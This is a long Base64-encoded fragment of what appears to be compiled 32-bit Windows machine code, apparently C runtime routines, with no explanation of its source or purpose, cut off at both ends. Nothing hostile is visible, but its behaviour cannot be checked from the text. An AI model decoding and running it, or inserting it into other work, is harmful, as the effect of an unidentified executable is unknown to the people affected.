jkIdflAQGY5CHXyK8ZAU0CL2FdT6C0XAACL+FmF/3UNVv8VmOBAAIvHX1tew1NWV+gx8P//g8QM6+b/JQTgQABqVGhg+0AA6CbX//8z/4l9/I1FnFD/FajgQADHRfz+////akBqIF5W6B4XAABZWTvHD4QUAgAAo6ArQQCJNYgrQQCNiAAIAADrMMZABACDCP/GQAUKiXgIxkAkAMZAJQrGQCYKiXg4xkA0AIPAQIsNoCtBAIHBAAgAADvBcsxmOX3OD4QKAQAAi0XQO8cPhP8AAACLOI1YBI0EO4lF5L4ACAAAO/58Aov+x0XgAQAAAOtbakBqIOiQFgAAWVmFwHRWi03gjQyNoCtBAIkBgwWIK0EAII2QAAgAAOsqxkAEAIMI/8ZABQqDYAgAgGAkgMZAJQrGQCYKg2A4AMZANACDwECLEQPWO8Jy0v9F4Dk9iCtBAHyd6waLPYgrQQCDZeAAhf9+bYtF5IsIg/n/dFaD+f50UYoDqAF0S6gIdQtR/xWk4EAAhcB0PIt14IvGwfgFg+YfweYGAzSFoCtBAItF5IsAiQaKA4hGBGigDwAAjUYMUOh7MwAAWVmFwA+EyQAAAP9GCP9F4EODReQEOX3gfJMz24vzweYGAzWgK0EAiwaD+P90C4P4/nQGgE4EgOtyxkYEgYXbdQVq9ljrCovDSPfYG8CDwPVQ/xWM4EAAi/iD//90Q4X/dD9X/xWk4EAAhcB0NIk+Jf8AAACD+AJ1BoBOBEDrCYP4A3UEgE4ECGigDwAAjUYMUOjlMgAAWVmFwHQ3/0YI6wqATgRAxwb+////Q4P7Aw+MZ/////81iCtBAP8VoOBAADPA6xEzwEDDi2Xox0X8/v///4PI/+gk1f//w4v/VriA+UAAvoD5QABXi/g7xnMPiweFwHQC/9CDxwQ7/nLxX17Di/9WuIj5QAC+iPlAAFeL+DvGcw+LB4XAdAL/0IPHBDv+cvFfXsOL/1WL7Fb/NRQWQQCLNbDgQAD/1oXAdCGhEBZBAIP4/3QXUP81FBZBAP/W/9CFwHQIi4D4AQAA6ye+cOhAAFb/FYDgQACFwHULVugU8///WYXAdBhoYOhAAFD/FYTgQACFwHQI/3UI/9CJRQiLRQheXcNqAOiH////WcOL/1WL7Fb/NRQWQQCLNbDgQAD/1oXAdCGhEBZBAIP4/3QXUP81FBZBAP/W/9CFwHQIi4D8AQAA6ye+cOhAAFb/FYDgQACFwHULVuiZ8v//WYXAdBhojOhAAFD/FYTgQACFwHQI/3UI/9CJRQiLRQheXcP/FbTgQADCBACL/1b/NRQWQQD/FbDgQACL8IX2dRv/NZgoQQDoZf///1mL8Fb/NRQWQQD/FbjgQACLxl7DoRAWQQCD+P90FlD/NaAoQQDoO////1n/0IMNEBZBAP+hFBZBAIP4/3QOUP8VvOBAAIMNFBZBAP/p3SUAAGoMaID7QADoH9P//75w6EAAVv8VgOBAAIXAdQdW6Nrx//9ZiUXki3UIx0Zc6OdAADP/R4l+FIXAdCRoYOhAAFCLHYTgQAD/04mG+AEAAGiM6EAA/3Xk/9OJhvwBAACJfnDGhsgAAABDxoZLAQAAQ8dGaCAWQQBqDeiRJgAAWYNl/AD/dmj/FcDgQADHRfz+////6D4AAABqDOhwJgAAWYl9/ItFDIlGbIXAdQihKBxBAIlGbP92bOi/DgAAWcdF/P7////oFQAAAOii0v//wzP/R4t1CGoN6FglAABZw2oM6E8lAABZw4v/Vlf/FRjgQAD/NRAWQQCL+OiR/v///9CL8IX2dU5oFAIAAGoB6DISAACL8FlZhfZ0Olb/NRAWQQD/NZwoQQDo6P3//1n/0IXAdBhqAFboxf7//1lZ/xXE4EAAg04E/4kG6wlW6DPu//9ZM/ZX/xUQ4EAAX4vGXsOL/1bof////4vwhfZ1CGoQ6Lfw//9Zi8Zew2oIaKj7QADopdH//4t1CIX2D4T4AAAAi0YkhcB0B1Do5u3//1mLRiyFwHQHUOjY7f//WYtGNIXAdAdQ6Mrt//9Zi0Y8hcB0B1DovO3//1mLRkCFwHQHUOiu7f//WYtGRIXAdAdQ6KDt//9Zi0ZIhcB0B1Doku3//1mLRlw96OdAAHQHUOiB7f//WWoN6AMlAABZg2X8AIt+aIX/dBpX/xXI4EAAhcB1D4H/IBZBAHQHV+hU7f//WcdF/P7////oVwAAAGoM6MokAABZx0X8AQAAAIt+bIX/dCNX6LENAABZOz0oHEEAdBSB/1AbQQB0DIM/AHUHV+i9CwAAWcdF/P7////oHgAAAFbo/Oz//1no4tD//8IEAIt1CGoN6JkjAABZw4t1CGoM6I0jAABZw4v/Vle+cOhAAFb/FYDgQACFwHUHVug57///WYv4hf8PhF4BAACLNYTgQABovOhAAFf/1miw6EAAV6OUKEEA/9ZopOhAAFejmChBAP/WaJzoQABXo5woQQD/1oM9lChBAACLNbjgQACjoChBAHQWgz2YKEEAAHQNgz2cKEEAAHQEhcB1JKGw4EAAo5goQQChvOBAAMcFlChBAPdfQACJNZwoQQCjoChBAP8VtOBAAKMUFkEAg/j/D4TMAAAA/zWYKEEAUP/WhcAPhLsAAADoa/H///81lChBAOgT+////zWYKEEAo5QoQQDoA/v///81nChBAKOYKEEA6PP6////NaAoQQCjnChBAOjj+v//g8QQo6AoQQDozyEAAIXAdGVo62FAAP81lChBAOg9+///Wf/QoxAWQQCD+P90SGgUAgAAagHoVA8AAIvwWVmF9nQ0Vv81EBZBAP81nChBAOgK+///Wf/QhcB0G2oAVujn+///WVn/FcTgQACDTgT/iQYzwEDrB+iS+///M8BfXsOL/1WL7DPAOUUIagAPlMBoABAAAFD/FczgQACjpChBAIXAdQJdwzPAQKOEK0EAXcOL/1WL7IPsEKEEEEEAg2X4AINl/ABTV79O5kC7uwAA//87x3QNhcN0CffQowgQQQDrYFaNRfhQ/xXg4EAAi3X8M3X4/xXc4EAAM/D/FcTgQAAz8P8V2OBAADPwjUXwUP8V1OBAAItF9DNF8DPwO/d1B75P5kC76wuF83UHi8bB4BAL8Ik1BBBBAPfWiTUIEEEAXl9bycODJYArQQAAw4v/VYvsUVGLRQxWi3UIiUX4i0UQV1aJRfzouy8AAIPP/1k7x3UR6N3B///HAAkAAACLx4vX60r/dRSNTfxR/3X4UP8VYOBAAIlF+DvHdRP/FRjgQACFwHQJUOjPwf//WevPi8bB+AWLBIWgK0EAg+YfweYGjUQwBIAg/YtF+ItV/F9eycNqFGjQ+0AA6JbN//+Dzv+JddyJdeCLRQiD+P51HOh0wf//gyAA6FnB///HAAkAAACLxovW6dAAAAAz/zvHfAg7BYgrQQByIehKwf//iTjoMMH//8cACQAAAFdXV1dX6LjA//+DxBTryIvIwfkFjRyNoCtBAIvwg+YfweYGiwsPvkwxBIPhAXUm6AnB//+JOOjvwP//xwAJAAAAV1dXV1fod8D//4PEFIPK/4vC61tQ6BcvAABZiX38iwP2RDAEAXQc/3UU/3UQ/3UM/3UI6Kn+//+DxBCJRdyJVeDrGuihwP//xwAJAAAA6KnA//+JOINN3P+DTeD/x0X8/v///+gMAAAAi0Xci1Xg6NnM///D/3UI6FQvAABZw4v/VYvs/wU4I0EAaAAQAADoSAwAAFmLTQiJQQiFwHQNg0kMCMdBGAAQAADrEYNJDASNQRSJQQjHQRgCAAAAi0EIg2EEAIkBXcOL/1WL7ItFCIP4/nUP6A/A///HAAkAAAAzwF3DVjP2O8Z8CDsFiCtBAHIc6PG///9WVlZWVscACQAAAOh5v///g8QUM8DrGovIg+AfwfkFiwyNoCtBAMHgBg++RAEEg+BAXl3DLaQDAAB0IoPoBHQXg+gNdAxIdAMzwMO4BAQAAMO4EgQAAMO4BAgAAMO4EQQAAMOL/1ZXi/BoAQEAADP/jUYcV1Do+tv//zPAD7fIi8GJfgSJfgiJfgzB4RALwY1+EKurq7kgFkEAg8QMjUYcK86/AQEAAIoUAYgQQE91942GHQEAAL4AAQAAihQIiBBATnX3X17Di/9Vi+yB7BwFAAChBBBBADPFiUX8U1eNhej6//9Q/3YE/xXk4EAAvwABAACFwA+E+wAAADPAiIQF/P7//0A7x3L0ioXu+v//xoX8/v//IITAdC6Nne/6//8PtsgPtgM7yHcWK8FAUI2UDfz+//9qIFLoN9v//4PEDEOKA0OEwHXYagD/dgyNhfz6////dgRQV42F/P7//1BqAWoA6GpMAAAz21P/dgSNhfz9//9XUFeNhfz+//9QV/92DFPoS0oAAIPERFP/dgSNhfz8//9XUFeNhfz+//9QaAACAAD/dgxT6CZKAACDxCQzwA+3jEX8+v//9sEBdA6ATAYdEIqMBfz9///rEfbBAnQVgEwGHSCKjAX8/P//iIwGHQEAAOsIxoQGHQEAAABAO8dyvutWjYYdAQAAx4Xk+v//n////zPJKYXk+v//i5Xk+v//jYQOHQEAAAPQjVogg/sZdwyATA4dEIrRgMIg6w+D+hl3DoBMDh0gitGA6iCIEOsDxgAAQTvPcsKLTfxfM81b6Nyu///Jw2oMaPD7QADoqsn//+ja9///i/ihRBtBAIVHcHQdg39sAHQXi3dohfZ1CGog6Ibo//9Zi8bowsn//8NqDehYHQAAWYNl/ACLd2iJdeQ7NUgaQQB0NoX2dBpW/xXI4EAAhcB1D4H+IBZBAHQHVuie5f//WaFIGkEAiUdoizVIGkEAiXXkVv8VwOBAAMdF/P7////oBQAAAOuOi3Xkag3oHRwAAFnDi/9Vi+yD7BBTM9tTjU3w6Cu///+JHagoQQCD/v51HscFqChBAAEAAAD/FezgQAA4Xfx0RYtN+INhcP3rPIP+/XUSxwWoKEEAAQAAAP8V6OBAAOvbg/78dRKLRfCLQATHBagoQQABAAAA68Q4Xfx0B4tF+INgcP2LxlvJw4v/VYvsg+wgoQQQQQAzxYlF/FOLXQxWi3UIV+hk////i/gz9ol9CDv+dQ6Lw+i3/P//M8DpnQEAAIl15DPAObhQGkEAD4SRAAAA/0Xkg8AwPfAAAABy54H/6P0AAA+EcAEAAIH/6f0AAA+EZAEAAA+3x1D/FfDgQACFwA+EUgEAAI1F6FBX/xXk4EAAhcAPhDMBAABoAQEAAI1DHFZQ6FfY//8z0kKDxAyJewSJcww5VegPhvgAAACAfe4AD4TPAAAAjXXvig6EyQ+EwgAAAA+2Rv8PtsnppgAAAGgBAQAAjUMcVlDoENj//4tN5IPEDGvJMIl14I2xYBpBAIl15OsqikYBhMB0KA+2Pg+2wOsSi0XgioBMGkEACEQ7HQ+2RgFHO/h26ot9CEZGgD4AddGLdeT/ReCDxgiDfeAEiXXkcumLx4l7BMdDCAEAAADoZ/v//2oGiUMMjUMQjYlUGkEAWmaLMUFmiTBBQEBKdfOL8+jX+///6bf+//+ATAMdBEA7wXb2RkaAfv8AD4U0////jUMeuf4AAACACAhASXX5i0ME6BL7//+JQwyJUwjrA4lzCDPAD7fIi8HB4RALwY17EKurq+uoOTWoKEEAD4VY/v//g8j/i038X14zzVvo16v//8nDahRoEPxAAOilxv//g03g/+jR9P//i/iJfdzo3Pz//4tfaIt1COh1/f//iUUIO0MED4RXAQAAaCACAADoRQYAAFmL2IXbD4RGAQAAuYgAAACLd2iL+/OlgyMAU/91COi4/f//WVmJReCFwA+F/AAAAIt13P92aP8VyOBAAIXAdRGLRmg9IBZBAHQHUOh64v//WYleaFOLPcDgQAD/1/ZGcAIPheoAAAD2BUQbQQABD4XdAAAAag3o2RkAAFmDZfwAi0MEo7goQQCLQwijvChBAItDDKPAKEEAM8CJReSD+AV9EGaLTEMQZokMRawoQQBA6+gzwIlF5D0BAQAAfQ2KTBgciIhAGEEAQOvpM8CJReQ9AAEAAH0QiowYHQEAAIiISBlBAEDr5v81SBpBAP8VyOBAAIXAdROhSBpBAD0gFkEAdAdQ6MHh//9ZiR1IGkEAU//Xx0X8/v///+gCAAAA6zBqDehSGAAAWcPrJYP4/3UggfsgFkEAdAdT6Ivh//9Z6A25///HABYAAADrBINl4ACLReDoXcX//8ODPawsQQAAdRJq/ehW/v//WccFrCxBAAEAAAAzwMOL/1WL7FNWi3UIi4a8AAAAM9tXO8N0bz14HkEAdGiLhrAAAAA7w3ReORh1WouGuAAAADvDdBc5GHUTUOgS4f///7a8AAAA6IxIAABZWYuGtAAAADvDdBc5GHUTUOjx4P///7a8AAAA6CZIAABZWf+2sAAAAOjZ4P///7a8AAAA6M7g//9ZWYuGwAAAADvDdEQ5GHVAi4bEAAAALf4AAABQ6K3g//+LhswAAAC/gAAAACvHUOia4P//i4bQAAAAK8dQ6Izg////tsAAAADogeD//4PEEI2+1AAAAIsHPbgdQQB0FzmYtAAAAHUPUOgMRgAA/zfoWuD//1lZjX5Qx0UIBgAAAIF/+EgbQQB0EYsHO8N0CzkYdQdQ6DXg//9ZOV/8dBKLRwQ7w3QLORh1B1DoHuD//1mDxxD/TQh1x1boD+D//1lfXltdw4v/VYvsU1aLNcDgQABXi30IV//Wi4ewAAAAhcB0A1D/1ouHuAAAAIXAdANQ/9aLh7QAAACFwHQDUP/Wi4fAAAAAhcB0A1D/1o1fUMdFCAYAAACBe/hIG0EAdAmLA4XAdANQ/9aDe/wAdAqLQwSFwHQDUP/Wg8MQ/00IddaLh9QAAAAFtAAAAFD/1l9eW13Di/9Vi+xXi30Ihf8PhIMAAABTVos1yOBAAFf/1ouHsAAAAIXAdANQ/9aLh7gAAACFwHQDUP/Wi4e0AAAAhcB0A1D/1ouHwAAAAIXAdANQ/9aNX1DHRQgGAAAAgXv4SBtBAHQJiwOFwHQDUP/Wg3v8AHQKi0MEhcB0A1D/1oPDEP9NCHXWi4fUAAAABbQAAABQ/9ZeW4vHX13Dhf90N4XAdDNWizA793QoV4k46MH+//9ZhfZ0G1boRf///4M+AFl1D4H+UBtBAHQHVuhZ/f//WYvHXsMzwMNqDGgw/EAA6D7C///obvD//4vwoUQbQQCFRnB0IoN+bAB0HOhX8P//i3BshfZ1CGog6BXh//9Zi8boUcL//8NqDOjnFQAAWYNl/ACNRmyLPSgcQQDoaf///4lF5MdF/P7////oAgAAAOvBagzo4hQAAFmLdeTDi/9Vi+yD7BChBBBBADPFiUX8U1aLdQz2RgxAVw+FNgEAAFboQMb//1m70BVBAIP4/3QuVugvxv//WYP4/nQiVugjxv//wfgFVo08haArQQDoE8b//4PgH1nB4AYDB1nrAovDikAkJH88Ag+E6AAAAFbo8sX//1mD+P90Llbo5sX//1mD+P50Ilbo2sX//8H4BVaNPIWgK0EA6MrF//+D4B9ZweAGAwdZ6wKLw4pAJCR/PAEPhJ8AAABW6KnF//9Zg/j/dC5W6J3F//9Zg/j+dCJW6JHF///B+AVWjTyFoCtBAOiBxf//g+AfWcHgBgMHWesCi8P2QASAdF3/dQiNRfRqBVCNRfBQ6DtJAACDxBCFwHQHuP//AADrXTP/OX3wfjD/TgR4EosGikw99IgIiw4PtgFBiQ7rDg++RD30VlDoWLX//1lZg/j/dMhHO33wfNBmi0UI6yCDRgT+eA2LDotFCGaJAYMGAusND7dFCFZQ6PJFAABZWYtN/F9eM81b6HOl///Jw4v/Vlcz/423QBxBAP826Kjr//+DxwRZiQaD/yhy6F9ew4v/VYvsVlcz9v91COgESQAAi/hZhf91JzkF6ChBAHYfVv8VKOBAAI2G6AMAADsF6ChBAHYDg8j/i/CD+P91yovHX15dw4v/VYvsVlcz9moA/3UM/3UI6IRJAACL+IPEDIX/dSc5BegoQQB2H1b/FSjgQACNhugDAAA7BegoQQB2A4PI/4vwg/j/dcOLx19eXcOL/1WL7FZXM/b/dQz/dQjoWEoAAIv4WVmF/3UsOUUMdCc5BegoQQB2H1b/FSjgQACNhugDAAA7BegoQQB2A4PI/4vwg/j/dcGLx19eXcOhBBBBAIPIATPJOQXsKEEAD5TBi8HDzMzMzMzMzMzMzMyLTCQE98EDAAAAdCSKAYPBAYTAdE73wQMAAAB17wUAAAAAjaQkAAAAAI2kJAAAAACLAbr//v5+A9CD8P8zwoPBBKkAAQGBdOiLQfyEwHQyhOR0JKkAAP8AdBOpAAAA/3QC682NQf+LTCQEK8HDjUH+i0wkBCvBw41B/YtMJAQrwcONQfyLTCQEK8HDi/9Vi+yD7BBTVot1DDPbO/N0FTldEHQQOB51EotFCDvDdAUzyWaJCDPAXlvJw/91FI1N8OiVtP//i0XwOVgUdR+LRQg7w3QHZg+2DmaJCDhd/HQHi0X4g2Bw/TPAQOvKjUXwUA+2BlDoxAAAAFlZhcB0fYtF8IuIrAAAAIP5AX4lOU0QfCAz0jldCA+VwlL/dQhRVmoJ/3AE/xVk4EAAhcCLRfB1EItNEDuIrAAAAHIgOF4BdBuLgKwAAAA4XfwPhGX///+LTfiDYXD96Vn////orLH//8cAKgAAADhd/HQHi0X4g2Bw/YPI/+k6////M8A5XQgPlcBQ/3UIi0XwagFWagn/cAT/FWTgQACFwA+FOv///+u6i/9Vi+xqAP91EP91DP91COjU/v//g8QQXcOL/1WL7IPsEP91DI1N8OiKs///D7ZFCItN8IuJyAAAAA+3BEElAIAAAIB9/AB0B4tN+INhcP3Jw4v/VYvsagD/dQjouf///1lZXcOL/1WL7PZADEB0BoN4CAB0GlD/dQjoN/v//1lZuf//AABmO8F1BYMO/13D/wZdw4v/VYvsVovw6xT/dQiLRRD/TQzouf///4M+/1l0BoN9DAB/5l5dw4v/VYvs9kcMQFNWi/CL2XQ3g38IAHUxi0UIAQbrMA+3A/9NCFCLx+h+////Q0ODPv9ZdRTod7D//4M4KnUQaj+Lx+hj////WYN9CAB/0F5bXcOL/1WL7IHsdAQAAKEEEEEAM8WJRfxTi10UVot1CDPAV/91EIt9DI2NtPv//4m1xPv//4md6Pv//4mFrPv//4mF+Pv//4mF1Pv//4mF9Pv//4mF3Pv//4mFsPv//4mF2Pv//+hDsv//hfZ1Nejur///xwAWAAAAM8BQUFBQUOh0r///g8QUgL3A+///AHQKi4W8+///g2Bw/YPI/+nPCgAAM/Y7/nUS6LOv//9WVlZWxwAWAAAAVuvFD7cPibXg+///ibXs+///ibXM+///ibWo+///iY3k+///ZjvOD4R0CgAAagJaA/o5teD7//+JvaD7//8PjEgKAACNQeBmg/hYdw8Pt8EPtoBI80AAg+AP6wIzwIu1zPv//2vACQ+2hDBo80AAagjB6AReiYXM+///O8YPhDP///+D+AcPh90JAAD/JIWfgkAAM8CDjfT7////iYWk+///iYWw+///iYXU+///iYXc+///iYX4+///iYXY+///6bAJAAAPt8GD6CB0SIPoA3Q0K8Z0JCvCdBSD6AMPhYYJAAAJtfj7///phwkAAION+Pv//wTpewkAAION+Pv//wHpbwkAAIGN+Pv//4AAAADpYAkAAAmV+Pv//+lVCQAAZoP5KnUriwODwwSJnej7//+JhdT7//+FwA+NNgkAAION+Pv//wT3ndT7///pJAkAAIuF1Pv//2vACg+3yY1ECNCJhdT7///pCQkAAIOl9Pv//wDp/QgAAGaD+Sp1JYsDg8MEiZ3o+///iYX0+///hcAPjd4IAACDjfT7////6dIIAACLhfT7//9rwAoPt8mNRAjQiYX0+///6bcIAAAPt8GD+El0UYP4aHRAg/hsdBiD+HcPhZwIAACBjfj7//8ACAAA6Y0IAABmgz9sdRED+oGN+Pv//wAQAADpdggAAION+Pv//xDpaggAAION+Pv//yDpXggAAA+3B2aD+DZ1GWaDfwI0dRKDxwSBjfj7//8AgAAA6TwIAABmg/gzdRlmg38CMnUSg8cEgaX4+////3///+kdCAAAZoP4ZA+EEwgAAGaD+GkPhAkIAABmg/hvD4T/BwAAZoP4dQ+E9QcAAGaD+HgPhOsHAABmg/hYD4ThBwAAg6XM+///AIuFxPv//1GNteD7///Hhdj7//8BAAAA6Oz7//9Z6bgHAAAPt8GD+GQPjzACAAAPhL0CAACD+FMPjxsBAAB0foPoQXQQK8J0WSvCdAgrwg+F7AUAAIPBIMeFpPv//wEAAACJjeT7//+Djfj7//9Ag730+///AI21/Pv//7gAAgAAibXw+///iYXs+///D42NAgAAx4X0+///BgAAAOnpAgAA94X4+///MAgAAA+FyQAAAION+Pv//yDpvQAAAPeF+Pv//zAIAAB1B4ON+Pv//yCLvfT7//+D//91Bb////9/g8ME9oX4+///IImd6Pv//4tb/Imd8Pv//w+EBQUAAIXbdQuhOBxBAImF8Pv//4Ol7Pv//wCLtfD7//+F/w+OHQUAAIoGhMAPhBMFAACNjbT7//8PtsBRUOiA+v//WVmFwHQBRkb/hez7//85vez7//980OnoBAAAg+hYD4TwAgAAK8IPhJUAAACD6AcPhPX+//8rwg+FxgQAAA+3A4PDBDP2RvaF+Pv//yCJtdj7//+Jnej7//+JhZz7//90QoiFyPv//42FtPv//1CLhbT7///Ghcn7//8A/7CsAAAAjYXI+///UI2F/Pv//1Dou/j//4PEEIXAfQ+JtbD7///rB2aJhfz7//+Nhfz7//+JhfD7//+Jtez7///pQgQAAIsDg8MEiZ3o+///hcB0OotIBIXJdDP3hfj7//8ACAAAD78AiY3w+///dBKZK8LHhdj7//8BAAAA6f0DAACDpdj7//8A6fMDAAChOBxBAImF8Pv//1Doqff//1np3AMAAIP4cA+P9gEAAA+E3gEAAIP4ZQ+MygMAAIP4Zw+O6P3//4P4aXRtg/hudCSD+G8Pha4DAAD2hfj7//+AibXk+///dGGBjfj7//8AAgAA61WLM4PDBImd6Pv//+gj9///hcAPhFb6///2hfj7//8gdAxmi4Xg+///ZokG6wiLheD7//+JBseFsPv//wEAAADpwQQAAION+Pv//0DHheT7//8KAAAA94X4+///AIAAAA+EqwEAAAPei0P4i1P86ecBAAB1EmaD+Wd1Y8eF9Pv//wEAAADrVzmF9Pv//34GiYX0+///gb30+///owAAAH49i730+///gcddAQAAV+ii9f//WYuN5Pv//4mFqPv//4XAdBCJhfD7//+Jvez7//+L8OsKx4X0+///owAAAIsDg8MIiYWU+///i0P8iYWY+///jYW0+///UP+1pPv//w++wf+19Pv//4md6Pv//1D/tez7//+NhZT7//9WUP81WBxBAOhC4f//Wf/Qi534+///g8QcgeOAAAAAdCGDvfT7//8AdRiNhbT7//9QVv81ZBxBAOgS4f//Wf/QWVlmg73k+///Z3Uchdt1GI2FtPv//1BW/zVgHEEA6Ozg//9Z/9BZWYA+LXURgY34+///AAEAAEaJtfD7//9W6Qj+//+JtfT7///Hhaz7//8HAAAA6ySD6HMPhGr8//8rwg+Eiv7//4PoAw+FyQEAAMeFrPv//ycAAAD2hfj7//+Ax4Xk+///EAAAAA+Eav7//2owWGaJhdD7//+Lhaz7//+DwFFmiYXS+///iZXc+///6UX+///3hfj7//8AEAAAD4VF/v//g8ME9oX4+///IHQc9oX4+///QImd6Pv//3QGD79D/OsED7dD/JnrF/aF+Pv//0CLQ/x0A5nrAjPSiZ3o+///9oX4+///QHQbhdJ/F3wEhcBzEffYg9IA99qBjfj7//8AAQAA94X4+///AJAAAIvai/h1AjPbg730+///AH0Mx4X0+///AQAAAOsag6X4+///97gAAgAAOYX0+///fgaJhfT7//+LxwvDdQYhhdz7//+Ntfv9//+LhfT7////jfT7//+FwH8Gi8cLw3Qti4Xk+///mVJQU1fouKf//4PBMIP5OYmdkPv//4v4i9p+BgONrPv//4gOTuu9jYX7/f//K8ZG94X4+///AAIAAImF7Pv//4m18Pv//3RZhcB0B4vOgDkwdE7/jfD7//+LjfD7///GATBA6zaF23ULoTwcQQCJhfD7//+LhfD7///Hhdj7//8BAAAA6wlPZoM4AHQGA8KF/3XzK4Xw+///0fiJhez7//+DvbD7//8AD4VlAQAAi4X4+///qEB0K6kAAQAAdARqLesOqAF0BGor6waoAnQUaiBYZomF0Pv//8eF3Pv//wEAAACLndT7//+Ltez7//8r3iud3Pv///aF+Pv//wx1F/+1xPv//42F4Pv//1NqIOiE9f//g8QM/7Xc+///i73E+///jYXg+///jY3Q+///6Iv1///2hfj7//8IWXQb9oX4+///BHUSV1NqMI2F4Pv//+hC9f//g8QMg73Y+///AHV1hfZ+cYu98Pv//4m15Pv///+N5Pv//42FtPv//1CLhbT7////sKwAAACNhZz7//9XUOhV8///g8QQiYWQ+///hcB+Kf+1nPv//4uFxPv//4214Pv//+it9P//A72Q+///g73k+///AFl/puscg43g+////+sTi43w+///Vo2F4Pv//+jW9P//WYO94Pv//wB8IPaF+Pv//wR0F/+1xPv//42F4Pv//1NqIOiI9P//g8QMg72o+///AHQT/7Wo+///6MDN//+Dpaj7//8AWYu9oPv//4ud6Pv//w+3BzP2iYXk+///ZjvGdAeLyOmh9f//ObXM+///dA2Dvcz7//8HD4VQ9f//gL3A+///AHQKi4W8+///g2Bw/YuF4Pv//4tN/F9eM81b6CWW///Jw4v/b3pAAGd4QACZeEAA9HhAAEB5QABMeUAAknlAAJF6QACL/1WL7GaLRQhmg/gwcwe4/////13DZ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